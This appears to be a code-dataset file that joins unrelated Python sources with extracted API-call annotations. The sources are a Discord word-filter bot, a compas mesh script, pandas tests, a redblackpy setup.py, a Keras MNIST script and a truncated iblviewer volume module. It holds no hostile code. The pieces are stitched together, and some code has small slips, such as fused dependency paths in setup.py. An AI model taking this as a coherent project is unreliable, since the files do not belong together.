'os.system', (['f"""{lconvert} -if xlf -i {l10n_file[\'xliff\']} -o {l10n_file[\'ts\']}"""'], {}), '(f"{lconvert} -if xlf -i {l10n_file[\'xliff\']} -o {l10n_file[\'ts\']}")\n', (7099, 7167), False, 'import os\n'), ((7258, 7309), 'os.system', 'os.system', (['f"""{lrelease} -idbased {l10n_file[\'ts\']}"""'], {}), '(f"{lrelease} -idbased {l10n_file[\'ts\']}")\n', (7267, 7309), False, 'import os\n'), ((1211, 1249), 'os.popen', 'os.popen', (['f"""{qmake} -query 
{propname}"""'], {}), "(f'{qmake} -query {propname}')\n", (1219, 1249), False, 'import os\n'), ((4746, 4800), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', '"""macos.pri"""'], {}), "('translations', 'generated', 'macos.pri')\n", (4758, 4800), False, 'import os\n'), ((2474, 2502), 'os.path.join', 'os.path.join', (['"""i18n"""', 'locale'], {}), "('i18n', locale)\n", (2486, 2502), False, 'import os\n'), ((3807, 3875), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', 'f"""mozillavpn_{locale}.ts"""'], {}), "('translations', 'generated', f'mozillavpn_{locale}.ts')\n", (3819, 3875), False, 'import os\n'), ((5790, 5845), 'os.path.join', 'os.path.join', (['"""scripts"""', '"""utils"""', '"""generate_strings.py"""'], {}), "('scripts', 'utils', 'generate_strings.py')\n", (5802, 5845), False, 'import os\n'), ((5874, 5915), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""'], {}), "('translations', 'generated')\n", (5886, 5915), False, 'import os\n'), ((5938, 5982), 'os.path.join', 'os.path.join', (['"""translations"""', '"""strings.yaml"""'], {}), "('translations', 'strings.yaml')\n", (5950, 5982), False, 'import os\n'), ((2914, 2975), 'os.path.join', 'os.path.join', (['"""translations"""', '"""generated"""', '"""mozillavpn_en.ts"""'], {}), "('translations', 'generated', 'mozillavpn_en.ts')\n", (2926, 2975), False, 'import os\n'), ((6853, 6886), 'os.path.basename', 'os.path.basename', (["l10n_file['ts']"], {}), "(l10n_file['ts'])\n", (6869, 6886), False, 'import os\n')] |
from discord.ext import commands
import discord
def setup(client):
client.add_cog(KeyWordFilter(client))
class KeyWordFilter(commands.Cog):
def __init__(self, client):
self.client = client
self.log_ch = self.client.get_channel(int(self.client.SETTINGS.LOG_CHANNEL))
@commands.Cog.listener()
async def on_message(self, msg):
if any(x in msg.content.split() for x in self.client.SETTINGS.BLACKLIST):
ctx = await self.client.get_context(msg)
await self.event_log(ctx, msg, "A blacklisted phrase was used!")
await msg.delete()
async def event_log(self, ctx, msg, event):
embed = discord.Embed()
embed.colour = discord.Colour.red()
embed.title = event
embed.add_field(name='User', value=msg.author, inline=True)
embed.add_field(name='Channel', value=msg.channel.name, inline=True)
embed.add_field(name='Message', value=f"> {msg.content}", inline=False)
await self.log_ch.send(embed=embed)
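# --- Illustrative sketch (editor's addition, discord.py 1.x style to match the
# synchronous setup() above). The SETTINGS container, blacklist entries and channel
# id are placeholder values; the caller would still need to run the bot with a token.
def _build_filtered_bot():
    from types import SimpleNamespace
    bot = commands.Bot(command_prefix="!")
    bot.SETTINGS = SimpleNamespace(BLACKLIST=["spamword"], LOG_CHANNEL="123456789")
    setup(bot)  # registers the KeyWordFilter cog defined above
    return bot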
| [
"discord.ext.commands.Cog.listener",
"discord.Embed",
"discord.Colour.red"
]
| [((300, 323), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (321, 323), False, 'from discord.ext import commands\n'), ((669, 684), 'discord.Embed', 'discord.Embed', ([], {}), '()\n', (682, 684), False, 'import discord\n'), ((708, 728), 'discord.Colour.red', 'discord.Colour.red', ([], {}), '()\n', (726, 728), False, 'import discord\n')] |
import os
import compas
from compas.datastructures import Mesh
from compas_rhino.artists import MeshArtist
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
artist = MeshArtist(mesh, layer="Mesh")
artist.draw_vertices(
color={key: (255, 0, 0) for key in mesh.vertices_on_boundary()})
artist.draw_vertexlabels(
text={key: str(mesh.vertex_degree(key)) for key in mesh.vertices()})
artist.draw_edges(
keys=list(mesh.edges_on_boundary()),
color=(255, 0, 0))
artist.draw_faces(
color={key: (150, 255, 150) for key in mesh.faces() if not mesh.is_face_on_boundary(key)})
| [
"os.path.dirname",
"compas_rhino.artists.MeshArtist",
"os.path.join",
"compas.datastructures.Mesh.from_obj"
]
| [((116, 141), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (131, 141), False, 'import os\n'), ((149, 175), 'os.path.join', 'os.path.join', (['HERE', '"""data"""'], {}), "(HERE, 'data')\n", (161, 175), False, 'import os\n'), ((183, 214), 'os.path.join', 'os.path.join', (['DATA', '"""faces.obj"""'], {}), "(DATA, 'faces.obj')\n", (195, 214), False, 'import os\n'), ((223, 242), 'compas.datastructures.Mesh.from_obj', 'Mesh.from_obj', (['FILE'], {}), '(FILE)\n', (236, 242), False, 'from compas.datastructures import Mesh\n'), ((253, 283), 'compas_rhino.artists.MeshArtist', 'MeshArtist', (['mesh'], {'layer': '"""Mesh"""'}), "(mesh, layer='Mesh')\n", (263, 283), False, 'from compas_rhino.artists import MeshArtist\n')] |
"""Tests for the pandas helpers in the pd_helpers.py module."""
import pytest
from pandas.testing import assert_frame_equal
from tests.conftest import create_dataframe
from ons_utils.pandas import *
def test_nested_dict_to_df():
"""Test for nested_dict_to_df."""
input_d = {
'bones': {
'femur': {'tendons': 24},
'humerus': {'tendons': 14},
},
'muscles': {
'gluteus_maximus': {'tendons': 18},
},
'cars': 7,
}
actual = nested_dict_to_df(
input_d,
columns=['number'],
level_names=('a', 'b', 'c'),
)
expected = create_dataframe([
('a', 'b', 'c', 'number'),
('bones', 'femur', 'tendons', 24),
('bones', 'humerus', 'tendons', 14),
('cars', None, None, 7),
('muscles', 'gluteus_maximus', 'tendons', 18),
])
assert_frame_equal(
# Sort values as dict order not preserved.
actual.sort_values(['a', 'b']),
# Set index because function returns a MultiIndex.
expected.set_index(['a', 'b', 'c'])
)
class TestStacker:
"""Group of tests for Stacker."""
@pytest.mark.skip(reason="test shell")
def test_Stacker(self):
"""Test for Stacker."""
pass
@pytest.mark.skip(reason="test shell")
def test_convert_level_to_datetime():
"""Test for this."""
pass
class TestMultiIndexSlicer:
"""Group of tests for MultiIndexSlicer."""
@pytest.mark.skip(reason="test shell")
def test_MultiIndexSlicer(self):
"""Test for MultiIndexSlicer."""
pass
@pytest.mark.skip(reason="test shell")
def test_get_index_level_values():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_apply():
"""Test for this."""
pass
@pytest.mark.skip(reason="test shell")
def test_shifted_within_year_ffill():
"""Test for this."""
pass
| [
"pytest.mark.skip",
"tests.conftest.create_dataframe"
]
| [((1278, 1315), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1294, 1315), False, 'import pytest\n'), ((1603, 1640), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1619, 1640), False, 'import pytest\n'), ((1713, 1750), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1729, 1750), False, 'import pytest\n'), ((1826, 1863), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1842, 1863), False, 'import pytest\n'), ((637, 836), 'tests.conftest.create_dataframe', 'create_dataframe', (["[('a', 'b', 'c', 'number'), ('bones', 'femur', 'tendons', 24), ('bones',\n 'humerus', 'tendons', 14), ('cars', None, None, 7), ('muscles',\n 'gluteus_maximus', 'tendons', 18)]"], {}), "([('a', 'b', 'c', 'number'), ('bones', 'femur', 'tendons', \n 24), ('bones', 'humerus', 'tendons', 14), ('cars', None, None, 7), (\n 'muscles', 'gluteus_maximus', 'tendons', 18)])\n", (653, 836), False, 'from tests.conftest import create_dataframe\n'), ((1164, 1201), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1180, 1201), False, 'import pytest\n'), ((1471, 1508), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""test shell"""'}), "(reason='test shell')\n", (1487, 1508), False, 'import pytest\n')] |
#
# Created by <NAME>.
# Copyright 2018 Intuition. All rights reserved.
#
import os
import platform
from setuptools import setup
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from Cython.Build import cythonize
from rbp_setup_tools.code_generation import generate_from_cython_src
from rbp_setup_tools.types import TYPES
if platform.system() == 'Darwin':
compile_opts = [ '-std=c++11',
'-mmacosx-version-min={:}'.format( platform.mac_ver()[0] ),
'-Ofast' ]
elif platform.system() == 'Linux':
compile_opts = [ '-std=c++11',
'-Ofast' ]
elif platform.system() == 'Windows':
compile_opts = [ '-std=c++11',
'-Ofast' ]
else:
raise EnvironmentError( 'Not supported platform: {plat}'.format(plat=platform.system()) )
#--------------------------------------------------------------------------------------------
# Generate cython code for all supporting types
#--------------------------------------------------------------------------------------------
src_1 = './redblackpy/cython_source/__dtype_tree_processing.pxi'
src_2 = './redblackpy/cython_source/__tree_series_dtype.pxi'
src_3 = './redblackpy/cython_source/__interpolation.pxi'
src_4 = './redblackpy/cython_source/__arithmetic.pxi'
src_1 = open(src_1, 'r')
src_2 = open(src_2, 'r')
src_3 = open(src_3, 'r')
src_4 = open(src_4, 'r')
output_1 = open('./redblackpy/cython_source/dtype_tree_processing.pxi', 'w')
output_2 = open('./redblackpy/cython_source/tree_series_dtype.pxi', 'w')
output_3 = open('./redblackpy/cython_source/interpolation.pxi', 'w')
output_4 = open('./redblackpy/cython_source/arithmetic.pxi', 'w')
generate_from_cython_src(src_1, output_1, TYPES[:-1], 0)
generate_from_cython_src(src_2, output_2, TYPES, 14)
generate_from_cython_src(src_3, output_3, TYPES, 0)
generate_from_cython_src(src_4, output_4, TYPES, 0)
src_1.close()
src_2.close()
src_3.close()
src_4.close()
output_1.close()
output_2.close()
output_3.close()
output_4.close()
#--------------------------------------------------------------------------------------------
ext_modules=[ Extension( "redblackpy.series.tree_series",
sources=["redblackpy/series/tree_series.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
                                     'core/tree/rb_tree.tpp',
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.series.series_iterator",
sources=["redblackpy/series/series_iterator.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'],
depends=[ 'core/tree/tree.hpp',
                                     'core/tree/rb_tree.tpp',
'core/tree/rb_node.tpp',
'core/tree/rb_node_valued.tpp',
'core/trees_iterator/iterator.hpp',
'core/trees_iterator/iterator.tpp' ], ),
Extension( "redblackpy.benchmark.timer",
sources=["redblackpy/benchmark/timer.pyx"],
extra_compile_args=compile_opts,
extra_link_args=compile_opts[:-1],
language = "c++",
include_dirs=['./redblackpy'] ) ]
setup( name='redblackpy',
ext_modules = cythonize(ext_modules),
version='0.1.3.0',
author='<NAME>',
author_email='<EMAIL>',
maintainer='Intuition',
maintainer_email='<EMAIL>',
install_requires=['cython'],
description='Data structures based on red-black trees.',
url='https://intuitionengineeringteam.github.io/RedBlackPy/',
download_url='https://github.com/IntuitionEngineeringTeam/RedBlackPy/archive/master.zip',
zip_safe=False,
packages=[ 'redblackpy', 'redblackpy.series',
'redblackpy.benchmark', 'redblackpy.tree_cython_api'],
package_data={'redblackpy.series': ['*.pxd']},
include_package_data=True,
license='Apache License 2.0',
long_description='RedBlackPy is a light Python library that provides data structures \
aimed to fast insertion, removal and self sorting to manipulating ordered data in efficient way.\
The core part of the library had been written on C++ and then was wrapped in Cython. \
Hope that many would find the primary data structures of this library very handy in working \
with time series. One of the main feature of this structures is an access by arbitrary \
key using interpolation, what makes processing of multiple non synchronized time series very simple.\
All data structures based on red black trees.',
classifiers = [ 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3' ] )
| [
"Cython.Build.cythonize",
"platform.mac_ver",
"rbp_setup_tools.code_generation.generate_from_cython_src",
"platform.system",
"distutils.extension.Extension"
]
| [((1740, 1796), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_1', 'output_1', 'TYPES[:-1]', '(0)'], {}), '(src_1, output_1, TYPES[:-1], 0)\n', (1764, 1796), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1797, 1849), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_2', 'output_2', 'TYPES', '(14)'], {}), '(src_2, output_2, TYPES, 14)\n', (1821, 1849), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1850, 1901), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_3', 'output_3', 'TYPES', '(0)'], {}), '(src_3, output_3, TYPES, 0)\n', (1874, 1901), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((1902, 1953), 'rbp_setup_tools.code_generation.generate_from_cython_src', 'generate_from_cython_src', (['src_4', 'output_4', 'TYPES', '(0)'], {}), '(src_4, output_4, TYPES, 0)\n', (1926, 1953), False, 'from rbp_setup_tools.code_generation import generate_from_cython_src\n'), ((374, 391), 'platform.system', 'platform.system', ([], {}), '()\n', (389, 391), False, 'import platform\n'), ((2189, 2601), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.series.tree_series"""'], {'sources': "['redblackpy/series/tree_series.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']", 'depends': "['core/tree/tree.hpp', 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp']"}), "('redblackpy.series.tree_series', sources=[\n 'redblackpy/series/tree_series.pyx'], extra_compile_args=compile_opts,\n extra_link_args=compile_opts[:-1], language='c++', include_dirs=[\n './redblackpy'], depends=['core/tree/tree.hpp',\n 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp'])\n", (2198, 2601), False, 'from distutils.extension import Extension\n'), ((2927, 3347), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.series.series_iterator"""'], {'sources': "['redblackpy/series/series_iterator.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']", 'depends': "['core/tree/tree.hpp', 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp']"}), "('redblackpy.series.series_iterator', sources=[\n 'redblackpy/series/series_iterator.pyx'], extra_compile_args=\n compile_opts, extra_link_args=compile_opts[:-1], language='c++',\n include_dirs=['./redblackpy'], depends=['core/tree/tree.hpp',\n 'core/tree/rb_tree.tppcore/tree/rb_node.tpp',\n 'core/tree/rb_node_valued.tpp', 'core/trees_iterator/iterator.hpp',\n 'core/trees_iterator/iterator.tpp'])\n", (2936, 3347), False, 'from distutils.extension import Extension\n'), ((3687, 3899), 'distutils.extension.Extension', 'Extension', (['"""redblackpy.benchmark.timer"""'], {'sources': "['redblackpy/benchmark/timer.pyx']", 'extra_compile_args': 'compile_opts', 'extra_link_args': 'compile_opts[:-1]', 'language': '"""c++"""', 'include_dirs': "['./redblackpy']"}), "('redblackpy.benchmark.timer', sources=[\n 'redblackpy/benchmark/timer.pyx'], 
extra_compile_args=compile_opts,\n extra_link_args=compile_opts[:-1], language='c++', include_dirs=[\n './redblackpy'])\n", (3696, 3899), False, 'from distutils.extension import Extension\n'), ((561, 578), 'platform.system', 'platform.system', ([], {}), '()\n', (576, 578), False, 'import platform\n'), ((4065, 4087), 'Cython.Build.cythonize', 'cythonize', (['ext_modules'], {}), '(ext_modules)\n', (4074, 4087), False, 'from Cython.Build import cythonize\n'), ((667, 684), 'platform.system', 'platform.system', ([], {}), '()\n', (682, 684), False, 'import platform\n'), ((498, 516), 'platform.mac_ver', 'platform.mac_ver', ([], {}), '()\n', (514, 516), False, 'import platform\n'), ((858, 875), 'platform.system', 'platform.system', ([], {}), '()\n', (873, 875), False, 'import platform\n')] |
import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('prepared image shape:', number.flatten().shape)
print('original number array:', number)
number = number.astype('float32')
number = number/255  # normalize to [0, 1]
number = number.flatten()
print('number.shape after preprocessing:', number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
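# --- Editor's note (sketch): predict_classes() was removed in newer tf.keras releases;
# the equivalent with a current Keras API would be:
#   print(np.argmax(model.predict(np.array([number])), axis=-1))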
#print('test label:', test_target[8000]) | [
"numpy.array",
"PIL.Image.open",
"keras.models.load_model"
]
| [((89, 111), 'PIL.Image.open', 'Image.open', (['"""1002.png"""'], {}), "('1002.png')\n", (99, 111), False, 'from PIL import Image\n'), ((121, 139), 'numpy.array', 'np.array', (['img_gray'], {}), '(img_gray)\n', (129, 139), True, 'import numpy as np\n'), ((367, 393), 'keras.models.load_model', 'load_model', (['"""mnist-dnn.h5"""'], {}), "('mnist-dnn.h5')\n", (377, 393), False, 'from keras.models import load_model\n'), ((535, 553), 'numpy.array', 'np.array', (['[number]'], {}), '([number])\n', (543, 553), True, 'import numpy as np\n')] |
from dataclasses import dataclass, field
from typing import Mapping, List, Any
from datetime import datetime
import logging
import pandas as pd
import glob
import numpy as np
import os
from collections import OrderedDict
import nrrd
import vtk
import vedo
from vtk.util.numpy_support import numpy_to_vtk
from iblviewer.collection import Collection
import iblviewer.objects as obj
import iblviewer.utils as utils
@dataclass
class VolumeModel:
RAW = 'raw'
SEGMENTED = 'segmented'
NORMALIZED_SUFFIX = '_norm'
DATA_TYPE = {RAW:0, SEGMENTED:1}
PREFIX = 'Volume'
__count = 0
def unique_name():
VolumeModel.__count += 1
return f'{VolumeModel.PREFIX}_{VolumeModel.__count}'
name: str = field(default_factory=unique_name)
file_path: str = None
scalars: Collection = field(default_factory=Collection)
axes: List = field(default_factory=lambda: [1, 1, 1])
data_min: float = None
data_max: float = None
data_map_step: float = 1.0
data: np.ndarray = None
data_type: str = RAW
resolution: int = 1
# Default units are microns.
units: float = 1e-06
base_color_map: Any = None
# At IBL, volume mappings are used from ibllib: ibllib.atlas.regions.mappings
mapping_name: str = None
lateralized: bool = False
# Mapping function. If None, the volume will be given as it is.
mapping: Any = None
luts: Collection = field(default_factory=Collection)
slicers: Collection = field(default_factory=Collection)
isosurfaces: Collection = field(default_factory=Collection)
interactive_subsampling: bool = True
volume_visible: bool = True
slices_visible: bool = True
transpose_shape: Any = None
dimensions: np.ndarray = np.zeros(3).astype(float)
center: np.ndarray = np.zeros(3).astype(float)
def compute_size(self):
"""
Compute volume size
"""
if self.data is None:
return
self.dimensions = np.array(self.data.shape)[:3]
if self.resolution is None:
return
self.resolution = int(self.resolution) # TODO: move this to constructor or init
self.dimensions *= self.resolution
self.center = np.ones(3) * self.resolution / 2 + self.dimensions / 2
def compute_range(self, force=False):
"""
Compute min and max range in the volume
:return: Min and max values
"""
if self.data_min is not None and self.data_max is not None and not force:
return self.data_min, self.data_max
self.data_min = np.min(self.data)
self.data_max = np.max(self.data)
#print('Volume min-max', self.data_min, self.data_max)
return self.data_min, self.data_max
def guess_volume_type(self):
"""
Infer the volume type when it was not specified by the user.
We assume here that typical values between -1 and 1 are raw volumes.
"""
if self.data_type is None:
if self.data_min is None or self.data_max is None:
self.compute_range()
if self.data_min >= -1 and self.data_max <= 1:
guess = VolumeModel.RAW
else:
guess = VolumeModel.SEGMENTED
self.data_type = guess
def is_segmented(self, auto_guess=True):
"""
Get whether current volume/image is segmented
:return: Boolean
"""
if self.data_type is None and auto_guess:
self.guess_volume_type()
return self.data_type == VolumeModel.SEGMENTED
def read_volume(self, file_path):
"""
Read local volume. Downloads the file first if it's remote.
:param file_path: Volume path
:return: 3D array
"""
if file_path.startswith('http') or file_path.startswith('ftp'):
downloaded_temp_file_path = vedo.download(file_path, verbose=False)
if file_path.endswith('nrrd'):
data, header = nrrd.read(downloaded_temp_file_path)
else:
data = vedo.loadImageData(downloaded_temp_file_path)
else:
if file_path.endswith('nrrd'):
data, header = nrrd.read(file_path, index_order='C')
else:
data = vedo.loadImageData(file_path)
return data
def load_volume(self, file_path, remap_scalars=False, mapping=None, make_current=True):
"""
Load a volume data file. Supports NRRD and many other formats thanks to vedo/VTK
:param file_path: Volume file path. Could support other file types easily.
:param remap_scalars: Whether scalar values in the volume are replaced by
their row id from a mapping that stores. This is necessary in the case of segmented
volumes with regions that have a discontinuous id.
:param mapping: Pandas Series or a Dictionary
:param make_current: Set the volume data as the current one
:return: 3D array
"""
data = None
if not remap_scalars or mapping is None:
data = self.import_volume(file_path)
else:
time = datetime.now()
new_file_path = utils.change_file_name(file_path, None, None, VolumeModel.NORMALIZED_SUFFIX)
if os.path.exists(new_file_path):
data = self.import_volume(new_file_path)
else:
data = self.import_volume(file_path)
data, mapping = self.remap_slow(data, mapping, new_file_path)
logging.info('Remapped scalar values in: ' + str(utils.time_diff(time)) + 's')
'''
if volume is not None:
logging.info('Opened atlas ' + new_file_path + ' in ' + str(utils.time_diff(time)) + 's')
min_value, max_value = np.amin(data), np.amax(data)
logging.info('Min max scalar values in volume ' + str(min_value) + ' -> ' + str(max_value))
else:
logging.error('Failed to open atlas ' + new_file_path)
'''
if make_current and data is not None:
self.data = data
return data, mapping
def transpose(self, shape=None):
"""
Transpose the volume for visualization in VTK
:param shape: The new shape. If None, will default to self.transpose_shape
"""
if shape is None:
shape = self.transpose_shape
if shape is None:
return
self.data = np.transpose(self.data, shape)
def remap_slow(self, data, mapping=None, write_path=None):
"""
Reassign volume values (slow on large volumes!) so that they're continuous
:param data: Volume ndarray
:param write_path: Where the modified volume will be stored
(to spare going through this method next time)
:param mapping: Pandas Series or a Dictionary that maps raw volume scalars to new ones
:return: Modified volume data
"""
logging.info('\nBuilding appropriate volume from Allen data source...')
#volume = np.vectorize(self.f)(data)
labels = np.sort(np.unique(data))
num_labels = len(labels)
if mapping is None:
mapping = pd.Series(labels)
logging.info('Num regions labeled in volume ' + str(num_labels) + ' from ' + str(mapping.size) + ' in atlas')
logging.info('Reassigning ' + str(num_labels) + ' scalar values...')
for iter_id in range(num_labels):
label = labels[iter_id]
ids = mapping.index[mapping == label].to_list()
if len(ids) < 1:
continue
# On a large volume, this takes a long time
data[data == label] = ids[0]
if num_labels > 10000 and iter_id % 10 == 0:
logging.info(' Progress: ' + str(int(iter_id/num_labels)*100) + '%')
if write_path is not None:
logging.info('Saving volume data under ' + write_path)
nrrd.write(write_path, data, index_order='C')
return data, mapping
def build_lut(self, scalar_map=None, scalar_range=None, color_map=None,
alpha_map=None, zero_is_transparent=True,
noise_amount=0.0, nan_rgba=None, make_active=True):
"""
Build a look-up table (LUT, sometimes known as transfer function) for the volume
:param scalar_map: A 2D list with values in first column from the volume itself and values from
the second column being your scalar values that correspond to such region
:param scalar_range: Min and max values in a list
:param color_map: Color map name to apply
:param alpha_map: Alpha map, either None or a list of values the same length as scalar_map, that
says how transparent a scalar value should be
:param zero_is_transparent: Whether zero values are made transparent, True by default
:param noise_amount: Whether a noise value is applied on the colors
:param nan_rgba: Color and transparency (RGBA) to assign to invalid (out of range or None) scalar values
:param make_active: Whether this one is made active (you still have to update the views after that)
:return: LUTModel
"""
lut_model = LUTModel()
lut_model.build(scalar_map, scalar_range, color_map, alpha_map,
zero_is_transparent, noise_amount, nan_rgba)
self.luts.store(lut_model, set_current=make_active)
return lut_model
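# --- Illustrative sketch (editor's addition): a minimal VolumeModel round trip on an
# in-memory array, with no file I/O. The array shape and 25-micron resolution are
# arbitrary example values.
def _volume_model_demo():
    model = VolumeModel(resolution=25)
    model.data = np.random.rand(10, 10, 10)
    model.compute_size()       # fills model.dimensions and model.center
    model.compute_range()      # fills model.data_min and model.data_max
    model.data_type = None     # force re-detection from the value range
    model.guess_volume_type()  # values within [-1, 1] -> VolumeModel.RAW
    return model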
def blend_maps(map1, map2, time, total_time):
"""
Blend color maps
"""
weight1 = max(0.0, total_time - time)
weight2 = max(0.0, time)
return map1 * weight1 + map2 * weight2
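# --- Illustrative sketch (editor's addition): with total_time=1.0, blend_maps() is a
# plain linear cross-fade; at time 0 only map1 contributes, at time 1 only map2 does.
# The two small color maps are arbitrary example values.
def _blend_maps_demo():
    map1 = np.array([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]])  # red, green
    map2 = np.array([[0.0, 0.0, 1.0], [1.0, 1.0, 1.0]])  # blue, white
    return blend_maps(map1, map2, time=0.25, total_time=1.0)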
class Volume(vedo.Volume):
"""
    Override of the vedo.Volume constructor, which is ill-designed in that
    it transposes the given numpy array without us knowing about it,
    without giving us the option to opt out.
"""
def __init__(self,
inputobj=None,
c='RdBu_r',
alpha=(0.0, 0.0, 0.2, 0.4, 0.8, 1.0),
alphaGradient=None,
alphaUnit=1,
mode=0,
shade=False,
spacing=None,
dims=None,
origin=None,
mapper='smart'):
vtk.vtkVolume.__init__(self)
vedo.BaseGrid.__init__(self)
self.axes = [1, 1, 1]
###################
if isinstance(inputobj, str):
if "https://" in inputobj:
from vedo.io import download
inputobj = download(inputobj, verbose=False) # fpath
elif os.path.isfile(inputobj):
pass
else:
inputobj = sorted(glob.glob(inputobj))
###################
if 'gpu' in mapper:
self._mapper = vtk.vtkGPUVolumeRayCastMapper()
elif 'opengl_gpu' in mapper:
self._mapper = vtk.vtkOpenGLGPUVolumeRayCastMapper()
elif 'smart' in mapper:
self._mapper = vtk.vtkSmartVolumeMapper()
elif 'fixed' in mapper:
self._mapper = vtk.vtkFixedPointVolumeRayCastMapper()
elif isinstance(mapper, vtk.vtkMapper):
self._mapper = mapper
else:
print("Error unknown mapper type", [mapper])
raise RuntimeError()
self.SetMapper(self._mapper)
###################
inputtype = str(type(inputobj))
#colors.printc('Volume inputtype', inputtype)
if inputobj is None:
img = vtk.vtkImageData()
elif vedo.utils.isSequence(inputobj):
if isinstance(inputobj[0], str): # scan sequence of BMP files
ima = vtk.vtkImageAppend()
ima.SetAppendAxis(2)
pb = vedo.utils.ProgressBar(0, len(inputobj))
for i in pb.range():
f = inputobj[i]
picr = vtk.vtkBMPReader()
picr.SetFileName(f)
picr.Update()
mgf = vtk.vtkImageMagnitude()
mgf.SetInputData(picr.GetOutput())
mgf.Update()
ima.AddInputData(mgf.GetOutput())
pb.print('loading...')
ima.Update()
img = ima.GetOutput()
else:
if "ndarray" not in inputtype:
inputobj = np.array(inputobj)
if len(inputobj.shape)==1:
varr = vedo.numpy2vtk(inputobj, dtype=np.float)
else:
# ------------------------------ Nasty lines commented here
#if len(inputobj.shape)>2:
#inputobj = np.transpose(inputobj, axes=[2, 1, 0])
varr = vedo.numpy2vtk(inputobj.ravel(order='F'), dtype=np.float)
varr.SetName('input_scalars')
img = vtk.vtkImageData()
if dims is not None:
img.SetDimensions(dims)
else:
if len(inputobj.shape)==1:
vedo.colors.printc("Error: must set dimensions (dims keyword) in Volume.", c='r')
raise RuntimeError()
img.SetDimensions(inputobj.shape)
img.GetPointData().SetScalars(varr)
#to convert rgb to numpy
# img_scalar = data.GetPointData().GetScalars()
# dims = data.GetDimensions()
# n_comp = img_scalar.GetNumberOfComponents()
# temp = utils.vtk2numpy(img_scalar)
# numpy_data = temp.reshape(dims[1],dims[0],n_comp)
# numpy_data = numpy_data.transpose(0,1,2)
# numpy_data = np.flipud(numpy_data)
elif "ImageData" in inputtype:
img = inputobj
elif isinstance(inputobj, vedo.Volume):
img = inputobj.GetMapper().GetInput()
elif "UniformGrid" in inputtype:
img = inputobj
elif hasattr(inputobj, "GetOutput"): # passing vtk object, try extract imagdedata
if hasattr(inputobj, "Update"):
inputobj.Update()
img = inputobj.GetOutput()
elif isinstance(inputobj, str):
from vedo.io import loadImageData, download
if "https://" in inputobj:
inputobj = download(inputobj, verbose=False)
img = loadImageData(inputobj)
else:
vedo.colors.printc("Volume(): cannot understand input type:\n", inputtype, c='r')
return
if dims is not None:
img.SetDimensions(dims)
if origin is not None:
img.SetOrigin(origin) ### DIFFERENT from volume.origin()!
if spacing is not None:
img.SetSpacing(spacing)
self._data = img
self._mapper.SetInputData(img)
self.mode(mode).color(c).alpha(alpha).alphaGradient(alphaGradient)
self.GetProperty().SetShade(True)
self.GetProperty().SetInterpolationType(1)
self.GetProperty().SetScalarOpacityUnitDistance(alphaUnit)
# remember stuff:
self._mode = mode
self._color = c
self._alpha = alpha
self._alphaGrad = alphaGradient
self._alphaUnit = alphaUnit
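# --- Illustrative sketch (editor's addition): constructing the patched Volume from a
# numpy array. Unlike upstream vedo.Volume, the array is not transposed behind the
# caller's back. The shape and 25-micron spacing are example values; note the module
# still uses np.float, so this targets the older numpy versions iblviewer supports.
def _volume_from_numpy_demo():
    data = np.zeros((64, 64, 64), dtype=np.float32)
    data[16:48, 16:48, 16:48] = 1.0  # a solid cube in the middle
    return Volume(data, spacing=[25, 25, 25], mapper='smart')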
@dataclass
class LUTModel:
"""
